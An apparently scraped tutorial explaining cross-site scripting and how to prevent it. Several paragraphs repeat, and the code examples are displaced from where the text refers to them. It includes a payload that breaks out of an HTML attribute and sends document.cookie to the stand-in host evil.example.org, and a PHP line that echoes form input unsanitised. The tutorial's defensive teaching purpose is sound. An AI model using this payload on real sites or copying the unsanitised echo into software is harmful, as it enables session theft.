Cross-Site Scripting (abbreviated "XSS") is a type of client-side attack which is principally caused by input a server-side application receives not being sanitised if that is to be output in the HTML document (e.g. a username). By merely theorising what is possible from a Cross-Site Scripting attack will make you realise how important it is to ensure input received through your application is sanitised before it is output to the user on the web page or provided as an attribute value of an HTML element. You may conclude this sounds similar to an SQL injection attack, where if input is not sanitised before it is used as part of an SQL query it permits an end user to execute their own arbitrary SQL code and wreck havoc in your SQL database and potentially steal information from it. But it is not exactly the same thing, but have similar principles of protection.
So what exactly does a Cross-Site Scripting attack consist of? In essence, if HTML can be submitted as input and returned as-is, that HTML code will be rendered by the browser. So in theory this means another website can steal cookie information from another website which belongs to the visitor of the attacking website.
See this example:
If you can imagine the following PHP code, you'll see exactly where the output is not being sanitised:
So in this example, the <input> tag is closed completely so some JavaScript code can be executed. It doesn't matter whether the URL is an image or not, your browser will visit the URL in the example above and before you know it, they have your cookie data. Of course, you may have certain preventative measures in place, for example you may restrict the active cookie to the IP address of the user whose cookie data had been stolen, but the fact that HTML and JavaScript code can be parsed by the browser is dangerous in itself.
How can they steal cookie data?
If you have an area where users can post comments for example, what if you do not sanitise input before it is displayed on the web page? This is a prime example where cookie data can be stolen because HTML and JavaScript code can be parsed if a user submits it. So this means if any user visits the page which has the the XSS attack active on, their cookie data will also be stolen.
Ways to prevent Cross-Site Scripting attacks
So what exactly does a Cross-Site Scripting attack consist of? In essence, if HTML can be submitted as input and returned as-is, that HTML code will be rendered by the browser. So in theory this means another website can steal cookie information from another website which belongs to the visitor of the attacking website.
See this example:
HTML Code:
" /><script>new Image().src = 'http://evil.example.org/steal.php?cookies=' + encodeURI(document.cookie);</script><"
HTML Code:
<input type="text" name="name" value="<?php echo $_POST['name']; ?>" /></p>
How can they steal cookie data?
If you have an area where users can post comments for example, what if you do not sanitise input before it is displayed on the web page? This is a prime example where cookie data can be stolen because HTML and JavaScript code can be parsed if a user submits it. So this means if any user visits the page which has the the XSS attack active on, their cookie data will also be stolen.
Ways to prevent Cross-Site Scripting attacks
- Sanitise all output - even if it is from your web application's database.
- Thoroughly test your web application to make sure it is fully secure in all the areas an end user can send data to your web application, e.g. through an HTML form.
- If you want to permit users to use certain HTML tags such as <strong> and <em>, you can consider using a library such as HTML Purifier (although we do not guarantee that the library is fully secure or error-free in what it is supposed to do).